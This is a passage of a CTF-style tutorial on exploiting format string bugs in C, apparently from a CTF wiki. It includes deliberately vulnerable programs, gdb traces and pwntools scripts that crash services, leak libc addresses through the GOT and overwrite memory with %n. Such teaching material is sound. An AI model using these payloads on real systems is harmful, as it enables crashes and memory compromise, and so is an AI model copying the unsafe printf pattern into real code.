Exploitation¶
In the previous section, we demonstrated two exploitation techniques for format string vulnerabilities:
- Crashing the program, since the probability that the address corresponding to %s is invalid is relatively high.
- Viewing process contents, outputting stack contents using %d, %f.
Below we will explain each aspect in more detail.
Crashing the Program¶
Generally speaking, using a format string vulnerability to crash the program is the simplest exploitation method, because we only need to input several %s:
%s%s%s%s%s%s%s%s%s%s%s%s%s%s
This is because it is impossible for every value on the stack to correspond to a valid address, so there will always be some address that causes the program to crash. Although this exploitation does not seem to allow the attacker to control the program, it can render the program unusable. For example, if a remote service has a format string vulnerability, we can attack its availability, crash the service, and thus prevent users from accessing it.
Leaking Memory¶
Using format string vulnerabilities, we can also obtain the content we want to output. Generally, there are the following types of operations:
- Leaking stack memory
- Getting the value of a certain variable
- Getting the memory at the address corresponding to a certain variable
- Leaking arbitrary address memory
- Using the GOT table to obtain libc function addresses, then obtain libc, and subsequently obtain other libc function addresses
- Blind dumping, dumping the entire program to obtain useful information.
Leaking Stack Memory¶
For example, given the following program:
#include <stdio.h>
int main() {
char s[100];
int a = 1, b = 0x22222222, c = -1;
scanf("%s", s);
printf("%08x.%08x.%08x.%s\n", a, b, c, s);
printf(s);
return 0;
}
Then, we simply compile it:
➜ leakmemory git:(master) ✗ gcc -m32 -fno-stack-protector -no-pie -o leakmemory leakmemory.c
leakmemory.c: In function 'main':
leakmemory.c:7:10: warning: format not a string literal and no format arguments [-Wformat-security]
printf(s);
^
As you can see, the compiler pointed out the problem in our program where no format string arguments were given. Below, let's see how to obtain the corresponding stack memory.
According to the C calling convention, the format string function will use variables on the stack from top to bottom as its parameters based on the format string (64-bit will obtain parameters according to its parameter passing rules). Here we mainly introduce the 32-bit case.
Getting Stack Variable Values¶
First, we can use format strings to obtain the values of variables on the stack. Let's try it, the output is as follows:
➜ leakmemory git:(master) ✗ ./leakmemory
%08x.%08x.%08x
00000001.22222222.ffffffff.%08x.%08x.%08x
ffcfc400.000000c2.f765a6bb
As you can see, we indeed obtained some content. For more detailed observation, we use GDB to debug and verify our idea. Here we removed some unnecessary information and only focus on the code segment and the stack.
First, start the program and set a breakpoint at the printf function:
➜ leakmemory git:(master) ✗ gdb leakmemory
gef➤ b printf
Breakpoint 1 at 0x8048330
Then, run the program:
gef➤ r
Starting program: /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory
%08x.%08x.%08x
At this point, the program waits for our input. We enter %08x.%08x.%08x and press Enter to let the program continue running. We can see that the program first breaks at the first call to the printf function:
Breakpoint 1, __printf (format=0x8048563 "%08x.%08x.%08x.%s\n") at printf.c:28
28 printf.c: 没有那个文件或目录.
────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
──────────────────────────────────────────────[ stack ]────
['0xffffccec', 'l8']
8
0xffffccec│+0x00: 0x080484bf → <main+84> add esp, 0x20 ← $esp
0xffffccf0│+0x04: 0x08048563 → "%08x.%08x.%08x.%s"
0xffffccf4│+0x08: 0x00000001
0xffffccf8│+0x0c: 0x22222222
0xffffccfc│+0x10: 0xffffffff
0xffffcd00│+0x14: 0xffffcd10 → "%08x.%08x.%08x"
0xffffcd04│+0x18: 0xffffcd10 → "%08x.%08x.%08x"
0xffffcd08│+0x1c: 0x000000c2
We can see that at this point we have entered the printf function. The first variable on the stack is the return address, the second variable is the address of the format string, the third variable is the value of a, the fourth variable is the value of b, the fifth variable is the value of c, and the sixth variable is the address corresponding to the format string we entered. Continue running the program:
gef➤ c
Continuing.
00000001.22222222.ffffffff.%08x.%08x.%08x
We can see that the program indeed outputs the value corresponding to each variable, and breaks at the next printf:
Breakpoint 1, __printf (format=0xffffcd10 "%08x.%08x.%08x") at printf.c:28
28 in printf.c
───────────────────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
────────────────────────────────────────────────────────[ stack ]────
['0xffffccfc', 'l8']
8
0xffffccfc│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp
0xffffcd00│+0x04: 0xffffcd10 → "%08x.%08x.%08x"
0xffffcd04│+0x08: 0xffffcd10 → "%08x.%08x.%08x"
0xffffcd08│+0x0c: 0x000000c2
0xffffcd0c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10
0xffffcd10│+0x14: "%08x.%08x.%08x" ← $eax
0xffffcd14│+0x18: ".%08x.%08x"
0xffffcd18│+0x1c: "x.%08x"
At this point, since the format string is %x%x%x, the program will parse the values at 0xffffcd04 and after as the first, second, and third parameters respectively, interpreting them as int type and outputting them. Continuing execution, we get the following result, which is indeed as expected:
gef➤ c
Continuing.
ffffcd10.000000c2.f7e8b6bb[Inferior 1 (process 57077) exited normally]
Of course, we can also use %p to get data, as follows:
%p.%p.%p
00000001.22222222.ffffffff.%p.%p.%p
0xfff328c0.0xc2.0xf75c46bb
It should be noted that the results obtained are not the same every time, because the data on the stack will differ due to different memory pages being allocated each time. This is because the stack does not initialize memory pages.
It should be noted that the methods given above all obtain each parameter on the stack sequentially. Is there a way to directly get the value that is considered the (n+1)th parameter on the stack? Of course there is. The method is as follows:
%n$x
Using the above string, we can get the value of the corresponding (n+1)th parameter. Why do we say the (n+1)th parameter here? This is because n in the format parameter refers to the nth output parameter corresponding to that format string, which is the (n+1)th parameter relative to the output function.
Here we debug again with gdb.
➜ leakmemory git:(master) ✗ gdb leakmemory
gef➤ b printf
Breakpoint 1 at 0x8048330
gef➤ r
Starting program: /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory
%3$x
Breakpoint 1, __printf (format=0x8048563 "%08x.%08x.%08x.%s\n") at printf.c:28
28 printf.c: 没有那个文件或目录.
─────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
─────────────────────────────────────────────────────[ stack ]────
['0xffffccec', 'l8']
8
0xffffccec│+0x00: 0x080484bf → <main+84> add esp, 0x20 ← $esp
0xffffccf0│+0x04: 0x08048563 → "%08x.%08x.%08x.%s"
0xffffccf4│+0x08: 0x00000001
0xffffccf8│+0x0c: 0x22222222
0xffffccfc│+0x10: 0xffffffff
0xffffcd00│+0x14: 0xffffcd10 → "%3$x"
0xffffcd04│+0x18: 0xffffcd10 → "%3$x"
0xffffcd08│+0x1c: 0x000000c2
gef➤ c
Continuing.
00000001.22222222.ffffffff.%3$x
Breakpoint 1, __printf (format=0xffffcd10 "%3$x") at printf.c:28
28 in printf.c
─────────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
─────────────────────────────────────────────────────[ stack ]────
['0xffffccfc', 'l8']
8
0xffffccfc│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp
0xffffcd00│+0x04: 0xffffcd10 → "%3$x"
0xffffcd04│+0x08: 0xffffcd10 → "%3$x"
0xffffcd08│+0x0c: 0x000000c2
0xffffcd0c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10
0xffffcd10│+0x14: "%3$x" ← $eax
0xffffcd14│+0x18: 0xffffce00 → 0x00000001
0xffffcd18│+0x1c: 0x000000e0
gef➤ c
Continuing.
f7e8b6bb[Inferior 1 (process 57442) exited normally]
We can see that we indeed obtained the value f7e8b6bb corresponding to the 4th parameter of printf.
Getting the String Corresponding to a Stack Variable¶
Furthermore, we can also get the string corresponding to a stack variable, which actually requires the use of %s. Here we still use the program above and debug with gdb, as follows:
➜ leakmemory git:(master) ✗ gdb leakmemory
gef➤ b printf
Breakpoint 1 at 0x8048330
gef➤ r
Starting program: /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory
%s
Breakpoint 1, __printf (format=0x8048563 "%08x.%08x.%08x.%s\n") at printf.c:28
28 printf.c: 没有那个文件或目录.
────────────────────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
────────────────────────────────────────────────────────[ stack ]────
['0xffffccec', 'l8']
8
0xffffccec│+0x00: 0x080484bf → <main+84> add esp, 0x20 ← $esp
0xffffccf0│+0x04: 0x08048563 → "%08x.%08x.%08x.%s"
0xffffccf4│+0x08: 0x00000001
0xffffccf8│+0x0c: 0x22222222
0xffffccfc│+0x10: 0xffffffff
0xffffcd00│+0x14: 0xffffcd10 → 0xff007325 ("%s"?)
0xffffcd04│+0x18: 0xffffcd10 → 0xff007325 ("%s"?)
0xffffcd08│+0x1c: 0x000000c2
gef➤ c
Continuing.
00000001.22222222.ffffffff.%s
Breakpoint 1, __printf (format=0xffffcd10 "%s") at printf.c:28
28 in printf.c
──────────────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
──────────────────────────────────────────────────────────────[ stack ]────
['0xffffccfc', 'l8']
8
0xffffccfc│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp
0xffffcd00│+0x04: 0xffffcd10 → 0xff007325 ("%s"?)
0xffffcd04│+0x08: 0xffffcd10 → 0xff007325 ("%s"?)
0xffffcd08│+0x0c: 0x000000c2
0xffffcd0c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10
0xffffcd10│+0x14: 0xff007325 ("%s"?) ← $eax
0xffffcd14│+0x18: 0xffffce3c → 0xffffd074 → "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat[...]"
0xffffcd18│+0x1c: 0x000000e0
gef➤ c
Continuing.
%s[Inferior 1 (process 57488) exited normally]
We can see that during the second execution of the printf function, it indeed treated the variable at 0xffffcd04 as a string variable and output the string at the address corresponding to its value.
Of course, not all such cases will run normally. If the corresponding variable cannot be parsed as a string address, the program will crash directly.
Additionally, we can also specify which parameter on the stack to use as the format string output. For example, if we specify the 3rd parameter of printf, as shown below, the program cannot parse it and crashes:
➜ leakmemory git:(master) ✗ ./leakmemory
%2$s
00000001.22222222.ffffffff.%2$s
[1] 57534 segmentation fault (core dumped) ./leakmemory
Tips Summary
- Use %x to get the corresponding stack memory, but it is recommended to use %p, which eliminates the need to consider differences in word size.
- Use %s to get the content at the address corresponding to a variable, but there is null byte truncation.
- Use %order$x to get the value of a specified parameter, and use %order$s to get the content at the address corresponding to a specified parameter.
Leaking Arbitrary Address Memory¶
As we can see from above, whether leaking consecutive variables on the stack or leaking specified variable values, we never fully controlled the address of the variable we wanted to leak. Such leaks are certainly useful, but not powerful enough. Sometimes, we may want to leak the GOT table content of a certain libc function to obtain its address, then get the libc version and other function addresses. In such cases, being able to fully control the leak of memory at a specified address becomes very important. So can we actually do this? Of course we can.
Let's think carefully again. Generally speaking, in format string vulnerabilities, the format string we read is on the stack (because it is a local variable of some function; in this example, s is a local variable of the main function). This means that when calling the output function, the value of the first parameter is actually the address of that format string. Let's use one of the function calls above as an example:
Breakpoint 1, __printf (format=0xffffcd10 "%s") at printf.c:28
28 in printf.c
──────────────────────────────────────────────────────────[ code:i386 ]────
0xf7e44667 <fprintf+23> inc DWORD PTR [ebx+0x66c31cc4]
0xf7e4466d nop
0xf7e4466e xchg ax, ax
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
──────────────────────────────────────────────────────────────[ stack ]────
['0xffffccfc', 'l8']
8
0xffffccfc│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp
0xffffcd00│+0x04: 0xffffcd10 → 0xff007325 ("%s"?)
0xffffcd04│+0x08: 0xffffcd10 → 0xff007325 ("%s"?)
0xffffcd08│+0x0c: 0x000000c2
0xffffcd0c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10
0xffffcd10│+0x14: 0xff007325 ("%s"?) ← $eax
0xffffcd14│+0x18: 0xffffce3c → 0xffffd074 → "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat[...]"
0xffffcd18│+0x1c: 0x000000e0
We can see that the second variable on the stack is our format string address 0xffffcd10, and the content stored at that address is indeed the "%s" format string.
Since we can control the format string, if we know which parameter the format string is when the output function is called — let's assume the format string is the kth parameter relative to the function call — then we can obtain the content at a specified address addr in the following way:
addr%k$s
Note: Here, if the format string is on the stack, then we can definitely determine the relative offset of the format string, because at the time of the function call, the stack pointer is at least 8 bytes or 16 bytes below the format string address.
The next question is how to determine which parameter the format string is. We can determine this using the following method:
[tag]%p%p%p%p%p%p...
Generally, we will repeat a character of machine word length as the tag, followed by several %p to output the stack contents. If the content matches our tag from before, then we can be fairly confident that this address is the address of the format string. The reason we say "fairly confident" is because it cannot be ruled out that some temporary variables on the stack also have that value. In general, this is extremely rare, and we can also try with different characters for further confirmation. Here we use the character 'A' as the specific character, and still use the previously compiled program, as follows:
➜ leakmemory git:(master) ✗ ./leakmemory
AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
00000001.22222222.ffffffff.AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
AAAA0xffaab1600xc20xf76146bb0x414141410x702570250x702570250x702570250x702570250x702570250x702570250x702570250x70250xffaab2240xf77360000xaec7%
From the position of 0x41414141, we can see that the starting address of our format string is exactly the 5th parameter of the output function, but the 4th parameter of the format string. Let's test this:
➜ leakmemory git:(master) ✗ ./leakmemory
%4$s
00000001.22222222.ffffffff.%4$s
[1] 61439 segmentation fault (core dumped) ./leakmemory
As we can see, our program crashed. Why? This is because we tried to parse the value corresponding to the format string as an address, but obviously that value cannot be parsed as a valid address, so the program crashed. The specific details can be seen in the debugging below:
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
───────────────────────────────────────────────────────────────────[ stack ]────
['0xffffcd0c', 'l8']
8
0xffffcd0c│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp
0xffffcd10│+0x04: 0xffffcd20 → "%4$s"
0xffffcd14│+0x08: 0xffffcd20 → "%4$s"
0xffffcd18│+0x0c: 0x000000c2
0xffffcd1c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10
0xffffcd20│+0x14: "%4$s" ← $eax
0xffffcd24│+0x18: 0xffffce00 → 0x00000000
0xffffcd28│+0x1c: 0x000000e0
───────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0xf7e44670 → Name: __printf(format=0xffffcd20 "%4$s")
[#1] 0x80484ce → Name: main()
────────────────────────────────────────────────────────────────────────────────
gef➤ help x/
Examine memory: x/FMT ADDRESS.
ADDRESS is an expression for the memory address to examine.
FMT is a repeat count followed by a format letter and a size letter.
Format letters are o(octal), x(hex), d(decimal), u(unsigned decimal),
t(binary), f(float), a(address), i(instruction), c(char), s(string)
and z(hex, zero padded on the left).
Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes).
The specified number of objects of the specified size are printed
according to the format.
Defaults for format and size letters are those previously used.
Default count is 1. Default address is following last thing printed
with this command or "print".
gef➤ x/x 0xffffcd20
0xffffcd20: 0x73243425
gef➤ vmmap
Start End Offset Perm Path
0x08048000 0x08049000 0x00000000 r-x /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory
0x08049000 0x0804a000 0x00000000 r-- /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory
0x0804a000 0x0804b000 0x00001000 rw- /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory
0x0804b000 0x0806c000 0x00000000 rw- [heap]
0xf7dfb000 0xf7fab000 0x00000000 r-x /lib/i386-linux-gnu/libc-2.23.so
0xf7fab000 0xf7fad000 0x001af000 r-- /lib/i386-linux-gnu/libc-2.23.so
0xf7fad000 0xf7fae000 0x001b1000 rw- /lib/i386-linux-gnu/libc-2.23.so
0xf7fae000 0xf7fb1000 0x00000000 rw-
0xf7fd3000 0xf7fd5000 0x00000000 rw-
0xf7fd5000 0xf7fd7000 0x00000000 r-- [vvar]
0xf7fd7000 0xf7fd9000 0x00000000 r-x [vdso]
0xf7fd9000 0xf7ffb000 0x00000000 r-x /lib/i386-linux-gnu/ld-2.23.so
0xf7ffb000 0xf7ffc000 0x00000000 rw-
0xf7ffc000 0xf7ffd000 0x00022000 r-- /lib/i386-linux-gnu/ld-2.23.so
0xf7ffd000 0xf7ffe000 0x00023000 rw- /lib/i386-linux-gnu/ld-2.23.so
0xffedd000 0xffffe000 0x00000000 rw- [stack]
gef➤ x/x 0x73243425
0x73243425: Cannot access memory at address 0x73243425
Obviously, the value 0x73243425 corresponding to the format string at 0xffffcd20 cannot be accessed by the program, so the program naturally crashed.
So what if we set an accessible address? For example, scanf@got — what would the result be? It should naturally output the address corresponding to scanf. Let's try it.
First, get the address of scanf@got, as follows:
The reason we didn't use the printf function here is that the scanf function has some strange handling of characters like 0a, 0b, 0c, 00, etc., which prevents normal reading. Feel free to try it if you're interested...
gef➤ got
/mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory: 文件格式 elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049ffc R_386_GLOB_DAT __gmon_start__
0804a00c R_386_JUMP_SLOT printf@GLIBC_2.0
0804a010 R_386_JUMP_SLOT __libc_start_main@GLIBC_2.0
0804a014 R_386_JUMP_SLOT __isoc99_scanf@GLIBC_2.7
Below we use pwntools to construct the payload as follows:
from pwn import *
sh = process('./leakmemory')
leakmemory = ELF('./leakmemory')
__isoc99_scanf_got = leakmemory.got['__isoc99_scanf']
print hex(__isoc99_scanf_got)
payload = p32(__isoc99_scanf_got) + '%4$s'
print payload
gdb.attach(sh)
sh.sendline(payload)
sh.recvuntil('%4$s\n')
print hex(u32(sh.recv()[4:8])) # remove the first bytes of __isoc99_scanf@got
sh.interactive()
Here, we use gdb.attach(sh) for debugging. When we run to the second printf function (remember to set a breakpoint), we can see that our fourth parameter indeed points to the address of scanf. The output is:
→ 0xf7615670 <printf+0> call 0xf76ebb09 <__x86.get_pc_thunk.ax>
↳ 0xf76ebb09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf76ebb0c <__x86.get_pc_thunk.ax+3> ret
0xf76ebb0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf76ebb10 <__x86.get_pc_thunk.dx+3> ret
───────────────────────────────────────────────────────────────────[ stack ]────
['0xffbbf8dc', 'l8']
8
0xffbbf8dc│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp
0xffbbf8e0│+0x04: 0xffbbf8f0 → 0x0804a014 → 0xf76280c0 → <__isoc99_scanf+0> push ebp
0xffbbf8e4│+0x08: 0xffbbf8f0 → 0x0804a014 → 0xf76280c0 → <__isoc99_scanf+0> push ebp
0xffbbf8e8│+0x0c: 0x000000c2
0xffbbf8ec│+0x10: 0xf765c6bb → <handle_intel+107> add esp, 0x10
0xffbbf8f0│+0x14: 0x0804a014 → 0xf76280c0 → <__isoc99_scanf+0> push ebp ← $eax
0xffbbf8f4│+0x18: "%4$s"
0xffbbf8f8│+0x1c: 0x00000000
At the same time, in our running terminal:
➜ leakmemory git:(master) ✗ python exploit.py
[+] Starting local process './leakmemory': pid 65363
[*] '/mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
0x804a014
\x14\xa0\x0%4$s
[*] running in new terminal: /usr/bin/gdb -q "/mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/leakmemory/leakmemory" 65363
[+] Waiting for debugger: Done
0xf76280c0
[*] Switching to interactive mode
[*] Process './leakmemory' stopped with exit code 0 (pid 65363)
[*] Got EOF while reading in interactiv
We indeed obtained the address of scanf.
However, it is not always the case that the offset is an integer multiple of the machine word length, allowing us to directly obtain the corresponding parameter. Sometimes, we need to pad our input format string so that the address whose content we want to print is located at an address that is an integer multiple of the machine word length. Generally, it looks something like this:
[padding][addr]
Note
We cannot directly type \x0c\xa0\x04\x08%4$s on the command line. Although the front part is indeed the address of printf@got, the scanf function will not recognize it as the corresponding string. Instead, it will read \, x, 0, c as individual characters. Below is an incorrect example:
0xffffccfc│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp 0xffffcd00│+0x04: 0xffffcd10 → "\x0c\xa0\x04\x08%4$s" 0xffffcd04│+0x08: 0xffffcd10 → "\x0c\xa0\x04\x08%4$s" 0xffffcd08│+0x0c: 0x000000c2 0xffffcd0c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10 0xffffcd10│+0x14: "\x0c\xa0\x04\x08%4$s" ← $eax 0xffffcd14│+0x18: "\xa0\x04\x08%4$s" 0xffffcd18│+0x1c: "\x04\x08%4$s" ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]──── [#0] 0xf7e44670 → Name: __printf(format=0xffffcd10 "\\x0c\\xa0\\x04\\x08%4$s") [#1] 0x80484ce → Name: main() ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── gef➤ x/x 0xffffcd10 0xffffcd10: 0x6330785c
Overwriting Memory¶
Above, we have demonstrated how to use format strings to leak stack memory and arbitrary address memory. So is it possible to modify the value of a variable on the stack, or even modify the memory of a variable at an arbitrary address? The answer is yes — as long as the address corresponding to the variable is writable, we can use format strings to modify its value. Here we can think about the type in format strings:
%n, does not output characters, but writes the number of characters successfully output so far into the variable pointed to by the corresponding integer pointer parameter.
Through this type parameter, combined with some tricks, we can achieve our goal. This is again divided into two parts: one for overwriting variables on the stack, and the second for overwriting variables at specified addresses.
Here we provide the following program to introduce the corresponding parts:
/* example/overflow/overflow.c */
#include <stdio.h>
int a = 123, b = 456;
int main() {
int c = 789;
char s[100];
printf("%p\n", &c);
scanf("%s", s);
printf(s);
if (c == 16) {
puts("modified c.");
} else if (a == 2) {
puts("modified a for a small number.");
} else if (b == 0x12345678) {
puts("modified b for a big number!");
}
return 0;
}
The makefile is in the corresponding folder. Regardless of which address's variable we are overwriting, we basically construct a payload similar to the following:
...[overwrite addr]....%[overwrite offset]$n
Where ... represents our padding content, overwrite addr represents the address we want to overwrite, and overwrite offset represents the position where the address we want to overwrite is stored as the nth parameter of the output function's format string. So generally, the steps are as follows:
- Determine the overwrite address
- Determine the relative offset
- Perform the overwrite
Overwriting Stack Memory¶
Determining the Overwrite Address¶
First, we naturally want to find a way to know the address of the stack variable c. Since almost all programs nowadays have ASLR protection enabled, the stack address keeps changing, so here we intentionally output the address of variable c.
Determining the Relative Offset¶
Next, we determine which parameter of printf's output the stored format string address corresponds to. Here we use the previously mentioned method of leaking stack variable values. Through debugging:
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
────────────────────────────────────────────────────────────────────────────────────[ stack ]────
['0xffffcd0c', 'l8']
8
0xffffcd0c│+0x00: 0x080484d7 → <main+76> add esp, 0x10 ← $esp
0xffffcd10│+0x04: 0xffffcd28 → "%d%d"
0xffffcd14│+0x08: 0xffffcd8c → 0x00000315
0xffffcd18│+0x0c: 0x000000c2
0xffffcd1c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10
0xffffcd20│+0x14: 0xffffcd4e → 0xffff0000 → 0x00000000
0xffffcd24│+0x18: 0xffffce4c → 0xffffd07a → "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat[...]"
0xffffcd28│+0x1c: "%d%d" ← $eax
We can see that the value of variable c is stored at 0xffffcd14. Then, we determine that the offset of the format string '%d%d' address 0xffffcd28 relative to printf's format string parameter 0xffffcd10 is 0x18. This means the format string is the 7th parameter of the printf function, or the 6th parameter of the format string.
Performing the Overwrite¶
This way, the value at the 6th parameter position is the address storing variable c, and we can use the %n feature to modify the value of c. The payload is as follows:
[addr of c]%012d%6$n
The length of addr of c is 4, so we need to input 12 more characters to reach 16 characters in order to modify the value of c to 16.
The specific script is as follows:
def forc():
sh = process('./overwrite')
c_addr = int(sh.recvuntil('\n', drop=True), 16)
print hex(c_addr)
payload = p32(c_addr) + '%012d' + '%6$n'
print payload
#gdb.attach(sh)
sh.sendline(payload)
print sh.recv()
sh.interactive()
forc()
The result is as follows:
➜ overwrite git:(master) ✗ python exploit.py
[+] Starting local process './overwrite': pid 74806
0xfffd8cdc
܌ %012d%6$n
܌ -00000160648modified c.
Overwriting Arbitrary Address Memory¶
Overwriting Small Numbers¶
First, let's consider how to modify a variable in the data segment to a small number, for example, a number smaller than the machine word length. Here we use 2 as an example. You might think there's no difference, but think carefully — is there really no difference? If we still place the address to overwrite at the very front, it will directly occupy machine-word-length (4 or 8) bytes. Obviously, no matter how we output afterwards, the count will always be greater than 4.
Perhaps we could use integer overflow to modify the value at the corresponding address, but this would mean we have to output a huge amount of content at once. And this, under normal circumstances, will basically never succeed in an attack.
So what should we do? Think again more carefully — do we really need to place the address of the variable to overwrite at the beginning of the string? It seems not. We only put the tag at the beginning of the string earlier to find the offset. If we put the tag in the middle, it doesn't matter either. Similarly, we can put the address in the middle, and as long as we can find the corresponding offset, we can still get the corresponding value. As mentioned earlier, our format string is the 6th parameter. Since we want to write 2 to the corresponding address, the bytes before the format string must be:
aa%k$nxx
At this point, the stored format string has already occupied 6 character positions. If we add two more characters aa, then aa%k is actually the 6th parameter, $nxx is actually the 7th parameter, and if we follow it with the address we want to overwrite, that would be the 8th parameter. So if we set k to 8 here, we can actually perform the overwrite.
Using IDA, we can obtain that the address of a is 0x0804A024 (since a and b are initialized global variables, they are not on the stack).
.data:0804A024 public a
.data:0804A024 a dd 7Bh
Therefore, we can construct the following exploit code:
def fora():
sh = process('./overwrite')
a_addr = 0x0804A024
payload = 'aa%8$naa' + p32(a_addr)
sh.sendline(payload)
print sh.recv()
sh.interactive()
The corresponding result is as follows:
➜ overwrite git:(master) ✗ python exploit.py
[+] Starting local process './overwrite': pid 76508
[*] Process './overwrite' stopped with exit code 0 (pid 76508)
